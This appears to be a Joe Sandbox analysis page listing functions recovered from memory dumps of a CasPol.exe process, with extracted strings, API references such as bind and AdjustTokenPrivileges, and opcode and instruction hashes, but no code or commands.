Opcode Fuzzy Hash: 16469d787dd1498bd1fd3e10299183839603c3cc087b24c40c9a195ec3070cb5
Instruction Fuzzy Hash: DEA27E70E012288FEB64DBB9C85479EB7F2AF85304F2580A9C509AB790DF74AD81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C8B70 Relevance: 26.3, Strings: 16, Instructions: 6319COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 1D4CBCA3
X1Kr, xrefs: 1D4CE3E3
d, xrefs: 1D4CB8BC
X1Kr, xrefs: 1D4CAE7C
X1Kr, xrefs: 1D4CD0B3
X1Kr, xrefs: 1D4C94DF
X1Kr, xrefs: 1D4CAEEE
d, xrefs: 1D4C963B
X1Kr, xrefs: 1D4CE2C3
._)r, xrefs: 1D4C96BE
X1Kr, xrefs: 1D4CE375
X1Kr, xrefs: 1D4CE369
X1Kr, xrefs: 1D4CE280
X1Kr, xrefs: 1D4CD466
X1Kr, xrefs: 1D4C94EF
X1Kr, xrefs: 1D4CBD21

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID: ._)r$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$d$d
API String ID: 0-1721323472
Opcode ID: 8eb4868c3b84cf618c0b6a7b9cdf7ef46dead1e21d3232e14769e753ba337f38
Instruction ID: b3daa3ba199eb72169ce7186df84a5715b20102f525ef9dd8cd3cb54a9a19c24
Opcode Fuzzy Hash: 8eb4868c3b84cf618c0b6a7b9cdf7ef46dead1e21d3232e14769e753ba337f38
Instruction Fuzzy Hash: 3BD3B375D00A299FDB65CF69CC40ACAB7F2BF89310F1581E5E90CAB221D771AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 200FC178 Relevance: 15.9, Strings: 12, Instructions: 887COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 200FC859
X1Kr, xrefs: 200FCA27
X1Kr, xrefs: 200FCA51
X1Kr, xrefs: 200FC890
X1Kr, xrefs: 200FC39A
X1Kr, xrefs: 200FC2F6
X1Kr, xrefs: 200FCB72
X1Kr, xrefs: 200FC83A
X1Kr, xrefs: 200FCAC0
X1Kr, xrefs: 200FC8B6
X1Kr, xrefs: 200FC32E
X1Kr, xrefs: 200FCAEF

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-2244375908
Opcode ID: 79ffd603651ba2af1b2846e0bce23e05da41299d7fbd60a3390b81c33e5c4d03
Instruction ID: 4607578ab8a001d5cf512bd484e6a45d263f8725ef50b2857e6838d539c84b05
Opcode Fuzzy Hash: 79ffd603651ba2af1b2846e0bce23e05da41299d7fbd60a3390b81c33e5c4d03
Instruction Fuzzy Hash: F1729135E00628CFDB15DF64C898B9EBBF2AF89300F1580A9D909AB261DB71AD45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 20101834 Relevance: 14.4, Strings: 11, Instructions: 688COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 20101E87
X1Kr, xrefs: 201019AF
X1Kr, xrefs: 20101D50
X1Kr, xrefs: 20101D33
X1Kr, xrefs: 20101D02
X1Kr, xrefs: 20101BBA
X1Kr, xrefs: 201019BB
X1Kr, xrefs: 20101989
X1Kr, xrefs: 20101E50
X1Kr, xrefs: 20101BD7
X1Kr, xrefs: 20101B89

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-2760012621
Opcode ID: 4760496bd8077ce62d1cb27c6d504d32ca17a80cd9ba5ec0c99cccc3f0bc28fb
Instruction ID: 349b6bb51e37538a8a1d64035e0cc549ef0d7af07939e849dc769450a7e541f2
Opcode Fuzzy Hash: 4760496bd8077ce62d1cb27c6d504d32ca17a80cd9ba5ec0c99cccc3f0bc28fb
Instruction Fuzzy Hash: 25426030A002548FDB14DBB8C89479DBBF3AF85304F258069D949AF3A6CA79DD85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 20103418 Relevance: 12.8, Strings: 9, Instructions: 1503COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 20103AD8
X1Kr, xrefs: 20103B34
$%Ir, xrefs: 201042C4
y , xrefs: 20104160
X1Kr, xrefs: 20103BC9
,#Ir, xrefs: 201042F7
X1Kr, xrefs: 201034CB
,:Kr, xrefs: 20103494
X1Kr, xrefs: 20103A80

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID:
String ID: $%Ir$,#Ir$,:Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$y
API String ID: 0-2255765626
Opcode ID: fa7483fe561d98432cf91c3fbe18df2112b3d6c82b52b97a59948847c2f00ee9
Instruction ID: 3a18c40308e1967a0ae4ae5c0ffc5e45f5e253960d42fc88d0d818f0f32baf01
Opcode Fuzzy Hash: fa7483fe561d98432cf91c3fbe18df2112b3d6c82b52b97a59948847c2f00ee9
Instruction Fuzzy Hash: 09B2C070B042149FDB04DBB8C89179EBBF7AF85310F218069E985EB3A2DA35EE45C751

Uniqueness

Uniqueness Score: -1.00%

Function 1D4CE844 Relevance: 9.5, Strings: 7, Instructions: 716COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 1D4CE9E8
X1Kr, xrefs: 1D4CE927
:@$r, xrefs: 1D4CEB86
X1Kr, xrefs: 1D4CE904
X1Kr, xrefs: 1D4CEB1F
:@$r, xrefs: 1D4CEBA1
X1Kr, xrefs: 1D4CEA31

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r$:@$r$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-978897011
Opcode ID: 5b15f44e744f55237eb2fa09de4ab2392129196251cdce3d2377ff3897a60d2a
Instruction ID: 36afe4c3dfc36add8f4673a9a643ee012aefe3a8ff0cc97dd1bdd9e02e7ea483
Opcode Fuzzy Hash: 5b15f44e744f55237eb2fa09de4ab2392129196251cdce3d2377ff3897a60d2a
Instruction Fuzzy Hash: 2302BE74B042559FDB18CBB8C894BAEBBF6AF88304F158079E505AB395DB34EC05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 200F9020 Relevance: 6.7, Strings: 5, Instructions: 409COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 200F923D
X1Kr, xrefs: 200F9301
X1Kr, xrefs: 200F92B7
X1Kr, xrefs: 200F91EF
X1Kr, xrefs: 200F91A4

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-1182105391
Opcode ID: 6a3c52b7b685369a266334899ea962d64fb6db887df5eadba2d8e0e931768183
Instruction ID: b55b15b60c815f923d7e2dc5cf00a545085042e5145d9700d629a702c2e8054d
Opcode Fuzzy Hash: 6a3c52b7b685369a266334899ea962d64fb6db887df5eadba2d8e0e931768183
Instruction Fuzzy Hash: F0E1B034F002249BDB14DBB9C89875EBAF2AFC4704F258528E51AAB794DF75EC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 20100070 Relevance: 5.5, Strings: 3, Instructions: 1720COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 20100C2E
X1Kr, xrefs: 20100C9B
X1Kr, xrefs: 20100CB8

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr
API String ID: 0-2362661268
Opcode ID: 921626851e96a84f0dda27a4f9d5f222000018376508ef9dc297a2cdfe377886
Instruction ID: 08942d43e3835f479e410dcab77875e286d054b33d20d2def34926725eab73da
Opcode Fuzzy Hash: 921626851e96a84f0dda27a4f9d5f222000018376508ef9dc297a2cdfe377886
Instruction Fuzzy Hash: 68E2EF34A003558FCB15DBB8C898B9EBBB2BF85300F1585A9D449DB392DB78ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 20100015 Relevance: 4.7, Strings: 3, Instructions: 907COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 20100C2E
X1Kr, xrefs: 20100C9B
X1Kr, xrefs: 20100CB8

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID:
String ID: X1Kr$X1Kr$X1Kr
API String ID: 0-2362661268
Opcode ID: 2310269a6b4ccff9a9fa88e7404aada8e043eac6e02cc766a5a26dd92f884759
Instruction ID: b1b52085f33593986d723fc74eb41b1ca6d75dbf21d736b9dafc9fb261b943ea
Opcode Fuzzy Hash: 2310269a6b4ccff9a9fa88e7404aada8e043eac6e02cc766a5a26dd92f884759
Instruction Fuzzy Hash: 07923B74A00229CFCB14DBA8C888A9EFBB2FF84304F158599D509AB355DB74ED81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 200FDF10 Relevance: 2.2, Strings: 1, Instructions: 907COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200FE734

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r
API String ID: 0-2175515567
Opcode ID: 9b9b71f282a48221153f78006743a7b76c8dcfe84c1cfaf467a605fb51c7578b
Instruction ID: 4945da92e1e95f0e10c36a393142ebb0611f14a56b6108cbb001990e82babd89
Opcode Fuzzy Hash: 9b9b71f282a48221153f78006743a7b76c8dcfe84c1cfaf467a605fb51c7578b
Instruction Fuzzy Hash: 4A728E34B012588FDB14DBB8C4986ADBBF2AF88304F258469D50ADB391DF79ED42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 200F4B28 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

|mHr, xrefs: 200F4B64

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: |mHr
API String ID: 0-3322498390
Opcode ID: 3accbed264a11af39a620cbdd72a3b25b8a297d09e06df277307e138715e8471
Instruction ID: c28ea667e9b07a5a815a974e8c5c9eed063cfc08130e4195de41ae21f666d79c
Opcode Fuzzy Hash: 3accbed264a11af39a620cbdd72a3b25b8a297d09e06df277307e138715e8471
Instruction Fuzzy Hash: ED028E34B002148FDB14DBB9C89876EBBF2AF88304F158569E906DB395DF79EC418B91

Uniqueness

Uniqueness Score: -1.00%

Function 20105110 Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20105150

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00375c8e5fa2ee8cc2ef4d532e1a30ceffc90e2600ada13aa3fac52bf6db689a
Instruction ID: 8d29dd88bbcca9df06568c0d12346eb294b4d2817b462bebd4d98460fd0455b8
Opcode Fuzzy Hash: 00375c8e5fa2ee8cc2ef4d532e1a30ceffc90e2600ada13aa3fac52bf6db689a
Instruction Fuzzy Hash: D0713A34A00215CFDB14DBB4C498BAEBBF2BF88345F118528E855AB394DB79DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAA7F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D2AAAFF

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 146515ca44f1262e0e17529b5af07701bdfbfbaf45d971417035bc8c7c8f190e
Instruction ID: 150ecd823a573009fe02624dfea5390d04f502931a5dd455f72c71db0a564b42
Opcode Fuzzy Hash: 146515ca44f1262e0e17529b5af07701bdfbfbaf45d971417035bc8c7c8f190e
Instruction Fuzzy Hash: 9A21BC765093849FDB138F25DC40B62BFF4EF06310F0885DAE9898F563D271A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF44CD Relevance: 1.6, APIs: 1, Instructions: 74networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF4553

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: ee422d9899acbe06e0a06018af4ff489ea8b1cf2d220d5d642e33619b560cfe3
Instruction ID: cef60a4b7bf94340882055e4dc2b8f32f9fa11dcc9435bf7dbfcd89d3cf7ba30
Opcode Fuzzy Hash: ee422d9899acbe06e0a06018af4ff489ea8b1cf2d220d5d642e33619b560cfe3
Instruction Fuzzy Hash: 6D2171B15093846FD721CB25DC44FA7BFA8EF46710F0884AAE985DB192D274A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF44F2 Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF4553

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 334b92fde2d14df9e542bcb66d9fd4065b22ff13cc14928e4dc738e524c41e1a
Instruction ID: 9e4021d13feb2f95decdc91743d5988f9a1924b0e86a8b8059adf215fdcfe913
Opcode Fuzzy Hash: 334b92fde2d14df9e542bcb66d9fd4065b22ff13cc14928e4dc738e524c41e1a
Instruction Fuzzy Hash: 451190B2500204AFE720DF15DD84FA7FBA8EF44710F1484AAEE49AB281D674E9088A71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB1D5 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1D2AB241

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0cbef630121cde59f940708f91622b261e14d558b5fd4db8f80c8de1a873fc17
Instruction ID: 098d44505e0960b32ecb3084b957bae1d93c2f7cf8d70543417bed98ab986b95
Opcode Fuzzy Hash: 0cbef630121cde59f940708f91622b261e14d558b5fd4db8f80c8de1a873fc17
Instruction Fuzzy Hash: 7A118E714093C09FD7128F25DC44A62FFB4EF06620F0985DBED858B563D365A958CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAAB6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D2AAAFF

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: c7525e7cc6f5fe16f09f742935b1acdd44efe6430ea09947424ca0d9e9eff943
Instruction ID: 11f0055fea6ce82a06315f9053f8ccdb54d86c12b683abde7e598cff90c9684c
Opcode Fuzzy Hash: c7525e7cc6f5fe16f09f742935b1acdd44efe6430ea09947424ca0d9e9eff943
Instruction Fuzzy Hash: 3511A0316002009FDB21CF55D984B66FBE4EF04320F08C8AADD498BA52D375E808CF72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1D2AA0D5

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: e2dcf7190eaee58e9756d848dd65f54267ac313f425ea33f858c3eb5e8a68dfd
Instruction ID: 51f53e1a6003b09bb084506fc6ccafd17cd465523e34bf8ace79a838a1206ddd
Opcode Fuzzy Hash: e2dcf7190eaee58e9756d848dd65f54267ac313f425ea33f858c3eb5e8a68dfd
Instruction Fuzzy Hash: 96019E319046409FDB21CF55D944B66FBA0EF44720F08C4AADD499BA52D375A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB206 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1D2AB241

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 5d9bc80ba31ca6049fe2c16c93fd91a6001c5edcdb4272227f996f18335496d7
Instruction ID: 4ca782bb74d4bcee169524129c21210a9fd249fa7ebe63884422afdb04da9db8
Opcode Fuzzy Hash: 5d9bc80ba31ca6049fe2c16c93fd91a6001c5edcdb4272227f996f18335496d7
Instruction Fuzzy Hash: 16018F315046449FD721CF55D984B65FBA0FF48720F08C49ADD994BA22D375A818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 200FD231 Relevance: .7, Instructions: 735COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8659d4475a1ba9bc4e4ac26aabb4b2c52adb8aeb5485b5f175fb5600946645ee
Instruction ID: 530e8d9b4ef21010eae2d37bbe037f9a4c892a86346116c85e21f8a018749705
Opcode Fuzzy Hash: 8659d4475a1ba9bc4e4ac26aabb4b2c52adb8aeb5485b5f175fb5600946645ee
Instruction Fuzzy Hash: C142AF347093858FE30697748869A563FE29F82704F0A84F7D185CF6A3DA78DD0AC762

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C6420 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819a4210f6e8b75b37f86b254a58d5de01dd89388c3cee004beee39da8c31236
Instruction ID: 6a4c89648ee65486eb0e7af6d783d704b20ac0da2fb8c2a9cd8968aaeff71f33
Opcode Fuzzy Hash: 819a4210f6e8b75b37f86b254a58d5de01dd89388c3cee004beee39da8c31236
Instruction Fuzzy Hash: 2FE1B238B093C19FE306CB78C954A663FB19B86304F1984FBD549CB7A6DA25EC05C752

Uniqueness

Uniqueness Score: -1.00%

Function 20102FD8 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2808e6622bdf78571b75706f26e7883a664930e6f964214322f26de342c93abb
Instruction ID: 0eb84cc95a818f861ffe949a73b98a2af7f80ec6015d9e257a9283cc3529a5bb
Opcode Fuzzy Hash: 2808e6622bdf78571b75706f26e7883a664930e6f964214322f26de342c93abb
Instruction Fuzzy Hash: 5BD1D530B083058FD710CFA9C8C579ABBBAFF85300F10856AE595DB696DB30EE458791

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C0870 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7c2d54ed07c1c7788e93f4cdd0fe5c5c19919c1e05a055ba1261b6c4c54e74
Instruction ID: cfbe6299d4ed518189e4be5e6da7bd18011fdaeea25a51240eee28a107a6eb96
Opcode Fuzzy Hash: 0f7c2d54ed07c1c7788e93f4cdd0fe5c5c19919c1e05a055ba1261b6c4c54e74
Instruction Fuzzy Hash: CAD1B6387043669FE705C7A9D884F7733D6ABC2B04F648079E6488F796EA75EC018792

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C87F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8fa2fa5d367c7a73380f25905b33f73337634448b39e8b607187d85704cf87
Instruction ID: 3b801e6442d363f404ab961336c9b6af2eabb767d2259e1f3884bdec102c3350
Opcode Fuzzy Hash: 3b8fa2fa5d367c7a73380f25905b33f73337634448b39e8b607187d85704cf87
Instruction Fuzzy Hash: FB914934B043519FF705C729C8847AABBE6AF85314F25C06AD508DB395DB7ADC02C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1D4C5981 Relevance: 7.9, Strings: 6, Instructions: 367COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 1D4C590E
X1Kr, xrefs: 1D4C578B
X1Kr, xrefs: 1D4C5AAD
X1Kr, xrefs: 1D4C5705
X1Kr, xrefs: 1D4C57C8
,:Kr, xrefs: 1D4C571E

Memory Dump Source

Source File: 00000011.00000002.775686354.000000001D4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d4c0000_CasPol.jbxd

Similarity

API ID:
String ID: ,:Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-2393323597
Opcode ID: dea35590256b8b3e9e4118217d3e6484793bfe09544d7b6568f8423db69c364b
Instruction ID: 5bb9fcaafaf680a3e4987fdf0fc0083f5bfd20c4afda438285f4d381375e31e8
Opcode Fuzzy Hash: dea35590256b8b3e9e4118217d3e6484793bfe09544d7b6568f8423db69c364b
Instruction Fuzzy Hash: 0FC1B678F002558FDB14CB69C890B6EB7B2EF89314F258429E509EB391DB75EC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 200F6291 Relevance: 5.4, Strings: 4, Instructions: 366COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F636E
:@$r, xrefs: 200F61F5
:@$r, xrefs: 200F600D
:@$r, xrefs: 200F60CC

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r$:@$r$:@$r$:@$r
API String ID: 0-1796555999
Opcode ID: 1613547f6550747d8a0fbe72824bb031d3184aa79f44188a6d42a66d0d608670
Instruction ID: 25a932a6b399cf506020b95c0e100957d2506f86fd37f9b5b60fabe00661a879
Opcode Fuzzy Hash: 1613547f6550747d8a0fbe72824bb031d3184aa79f44188a6d42a66d0d608670
Instruction Fuzzy Hash: 88C1A230B001198FFB14DBECC49879E7BE6EB89304F208435E516DB392CE69DD419762

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B841 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00F3B84A

Strings

TQNJ, xrefs: 00F20C4B

Memory Dump Source

Source File: 00000011.00000002.763308383.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f20000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID: TQNJ
API String ID: 1852365436-4037462379
Opcode ID: 7093ac6f7a18a83725c2f9a5f2af61ba1c78678f76c08757a0a71aae609d4ba1
Instruction ID: 5eff85f22307266528ea33fb055b8a5d35a2bba53cb0f58972a3a91e6273194f
Opcode Fuzzy Hash: 7093ac6f7a18a83725c2f9a5f2af61ba1c78678f76c08757a0a71aae609d4ba1
Instruction Fuzzy Hash: 7531327391A3A1CFDB21CB9964843A97B51AF63370B1C038ADCC08F2A3D7119C09D781

Uniqueness

Uniqueness Score: -1.00%

Function 200F7879 Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

:@$r, xrefs: 200F798C
:@$r, xrefs: 200F797D

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r$:@$r
API String ID: 0-2638069821
Opcode ID: 28aa81235aee0dd2f1b80d7c925125ad2aec2ff150dce30443b4e8e7ca940cb5
Instruction ID: 09379015e03ab15ed0846fe84048325babd987f7830e60beda2eafefbe2f84ff
Opcode Fuzzy Hash: 28aa81235aee0dd2f1b80d7c925125ad2aec2ff150dce30443b4e8e7ca940cb5
Instruction Fuzzy Hash: 28514A34F002688FDB14DBB8C49879EBBF2AF85304F1088A9E51AA7340EF759D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 200F9AE8 Relevance: 1.9, Strings: 1, Instructions: 693COMMON

Download Yara Rule

Strings

j, xrefs: 200F9FB2

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: 0eb2f3467851b175397c0a373360609edaf18caa3fc499ed5b5622eed08e2cdc
Instruction ID: c08c670c6a74b0681a73fad4a8bd74c383e85b34e03b6132275986325e731c8f
Opcode Fuzzy Hash: 0eb2f3467851b175397c0a373360609edaf18caa3fc499ed5b5622eed08e2cdc
Instruction Fuzzy Hash: 1C426930E002198FEB14DBA8C49879EBBF2EF89304F248479E509DB392DA75DD81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 20105488 Relevance: 1.8, APIs: 1, Instructions: 323libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20105715

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

